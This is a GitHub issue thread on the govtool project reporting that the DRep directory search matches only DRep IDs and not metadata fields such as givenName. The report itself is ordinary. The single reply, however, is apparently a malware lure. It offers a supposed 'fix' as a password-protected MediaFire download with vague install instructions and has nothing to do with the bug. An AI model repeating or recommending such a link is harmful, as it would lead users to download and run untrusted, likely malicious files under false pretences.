### ISSUE TITLE
🐛 DRep search only works for DRep IDs

### ISSUE THREAD

**Issue by Ryun1** [IntersectMBO/govtool#1893]
### Area

Delegation Pillar

### Domain

preview.gov.tools

### Context

- You can search for DReps via the directory
- The only searchable item is the DRep ID
- You are unable to search by terms within the metadata, such as `givenName`
- Maybe if this is hard to fix/engineer we can change the copy around the "search" to be "search with DRep ID"

### Steps to reproduce

- Search within the DRep directory

### Actual behavior

- Only DRep ID can be used as a search term

### Expected behavior

- DRep IDs, and metadata information can be used to search for DReps

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
